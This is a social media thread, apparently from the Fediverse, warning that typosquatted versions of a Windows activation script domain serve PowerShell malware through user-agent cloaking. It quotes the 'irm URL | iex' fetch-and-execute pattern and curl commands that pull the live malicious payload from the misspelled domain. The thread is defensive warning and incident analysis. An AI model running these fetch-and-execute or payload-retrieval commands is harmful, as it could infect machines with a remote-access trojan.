PSA if you ran "irm https://get.activated.win | iex" but instead of activated you typed in actvated or actrivated you have been ratted and should reset your pc
@luna @reiddragon it checks if the user agent is powershell and if it isn't it redirects to the real thing
@reiddragon @tim can confirm, it downloaded a file which ends with iex (irm https://get.activated.win) and the rest of the script downloads Update.zip
@tim Woah, that's actually crazy. Wild, honestly.
Clever as fuck, if I'm being honest lol but still, hella wrong & I feel for those it may have impacted.
@tim this is why people should copy Commands directly from the Website
@murasakinokitsune @tim It's for this exact reason I read into anything I run via commands from sources like this & as you've said, copy directly.
It's just never worth the risk, especially not over impatience.
@luna @reiddragon @tim seems like their dns is cloudflare and they use tucows as a registrar, probably can get them taken down if we all submit abuse reports
If you want to check if you got infected check the following folder: "C:\Windows\SystemHealth\Update"
@tim Are you able to elaborate? I wouldnβt be surprised if this is a thing, but trying to curl or go to the incorrect URLs myself gives me a 301 Moved Permanently and takes me to get.activated.win
@tim @luna @reiddragon SHEESH. now I'm gonna think about that every time I'm prereading/reviewing a curl+bash
@noisytoot @tim Wasnβt able to recreate using WindowsPowerShell user agents from Windows 10 or 11. 
@luna @reiddragon @tim Iβm curious enough to try this out in a VM as well. I canβt seem to get it to trigger by simply using a WindowsPowerShell user agent with curl. 
@maddy @reiddragon @tim I managed to trigger it using a PowerShell regex that literally came up in the DuckDuckGo AI summary of all places
curl -A "Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/3.0" https://get.actvated.win
@stag @luna @reiddragon @tim cloudflareβs abuse report form is broken and not letting me submit a report. I did send one to the registrar though
@syphist @luna @reiddragon @tim seems to have worked for me, which form are you using? maybe its an adblock or referer issue
@luna @reiddragon @tim Ahh, there we go. Turns out the βhttpsβ made the difference. The same user agents I was trying actually work and bring up the malicious script when I add https:// to the URL, which I didnβt have before. 
@tim perhaps clarify what exactly to check?
also, is this related to the old https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/, or is it a new unrelated typosquat?
@tim so telling people to do the windows equivalent of piping from curl to bash was not such a good idea after all heh
> curl --user-agent "Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/3.0" https://get.actvated.win
returned the malicious payload for me that would download some Update.zip from another mispelled domain
@luna @reiddragon @tim https://www.bleepingcomputer.com/news/security/fake-mas-windows-activation-domain-used-to-spread-powershell-malware/ yeah, not the first time
i recall watching a video about it from eric parker but it seems to be gone now
tl;dr people really need to be aware that iex is an insanely powerful command (it simply runs a script from a remote resource)
@tim Typosquatting, huh ? Simple, but effective.
@tim OH MY GOD I THOUGHT THIS MEANT THE REAL ONE GOT RATTED
@stag @tim @reiddragon @luna turns out the form was really abtuse, the captcha broke, and their βtoo many requestsβ time out was way too quick to block me
@tim detection of the downloaded Update.zip is pretty poor too at time of writing, virustotal reporting just 6 engines detecting a trojan
https://www.virustotal.com/gui/file/de110057a26ba10cf1c9071744e4cdcae347746dbf2528296d7b6dc2a923cf4c
@sleepybisexual I'm guessing someone's typosquatting the activated.win domain, and putting some sort of malicious PowerShell script there.
irm is a PowerShell command called Invoke-RestMethod and makes a web request to an address, and iex is Invoke-Expression, which executes a PowerShell script from a string. That means, if you can serve a malicious PowerShell script at address https://bad.website, the command irm https://bad.website | iex will download and immediately execute said script.
@risc Updated the original post to make it more clear what should be checked. I am not sure if this case is related to the old typosquat as i was not aware of it.
@reiddragon @luna @tim I assume they check that you're actually using the power shell user agent
@pomagarnet
Best strat is to curl to a temp file, read file, then run file.
@tim @luna @reiddragon